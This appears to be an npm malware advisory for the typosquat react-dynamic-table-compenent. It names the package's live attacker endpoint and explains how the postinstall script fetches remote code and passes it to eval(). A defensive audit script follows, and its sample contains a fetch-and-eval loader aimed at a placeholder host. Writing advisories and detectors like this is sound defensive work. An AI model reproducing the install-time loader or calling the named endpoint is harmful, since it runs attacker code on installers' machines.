MAL-2026-6533
Malicious code in react-dynamic-table-compenent (npm)
Details
## Source: amazon-inspector (c55ead8b66faca1e08b2babafa252da2371b535c010a5c14d8b0d0e2a44aadf8)

Package name misspells 'component' as 'compenent', a one-letter typosquat of react-dynamic-table-component. The package's postinstall script runs `node dist/setup.js`, which fetches https://everydaynodechecker-39143n.vercel.app/api/key?mem=master and passes the response body directly to eval(), inside a function misleadingly named initDatabase. The fetched content is attacker-controlled and mutable, so any default `npm install` of this package executes whatever code the endpoint currently serves on the installer's machine. The cover-story naming (initDatabase, key?mem=master) presents the request as benign configuration while it is a remote code loader.
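The traits described above (a near-miss package name, and an install hook whose script combines a network fetch with `eval`) can be screened for in an unpacked tarball before anything is installed. The following is an added example, not code from the advisory or the package: `auditPackage`, `editDistance`, the regexes and the placeholder URL are assumptions made for illustration, and the file check is a co-occurrence heuristic, not data-flow analysis.

```javascript
// Added example: heuristic static audit for the install-time loader pattern.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];
const NETWORK = /\bfetch\s*\(|\bhttps?\.(get|request)\s*\(/;
const DYNAMIC_EVAL = /\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.run\w*\s*\(/;

// Levenshtein distance, used to spot near-miss package names.
function editDistance(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1,
        prev[j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
    }
    prev = cur;
  }
  return prev[b.length];
}

// manifest: parsed package.json; files: { path: sourceText } from the tarball;
// intended: names the project means to depend on (assumption: caller supplies).
function auditPackage(manifest, files, intended = []) {
  const findings = [];
  for (const name of intended) {
    const d = editDistance(manifest.name, name);
    if (d > 0 && d <= 2) findings.push(`name is ${d} edit(s) from ${name}`);
  }
  for (const hook of INSTALL_HOOKS) {
    const cmd = (manifest.scripts || {})[hook];
    if (!cmd) continue;
    findings.push(`${hook} runs: ${cmd}`);
    // Follow each `node <file>` target named in the hook command.
    for (const [, target] of cmd.matchAll(/\bnode\s+(?:\.\/)?([^\s;&|]+)/g)) {
      const src = files[target];
      if (src === undefined) findings.push(`${target}: source not in tarball`);
      else if (NETWORK.test(src) && DYNAMIC_EVAL.test(src))
        findings.push(`${target}: network fetch and dynamic evaluation together`);
    }
  }
  return findings;
}

// Constructed sample mirroring the advisory's description; placeholder URL, never executed.
const sampleManifest = { name: 'react-dynamic-table-compenent',
  scripts: { postinstall: 'node dist/setup.js' } };
const sampleFiles = { 'dist/setup.js':
  "async function initDatabase() { const r = await fetch('https://loader.example.invalid/k'); eval(await r.text()); }" };
console.log(auditPackage(sampleManifest, sampleFiles, ['react-dynamic-table-component']));
```

Installing with `npm install --ignore-scripts` keeps lifecycle hooks such as `postinstall` from running while a package is being reviewed.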
Affected packages
No fixed version published yet for react-dynamic-table-compenent (npm). Pin to a known-safe version or switch to an alternative.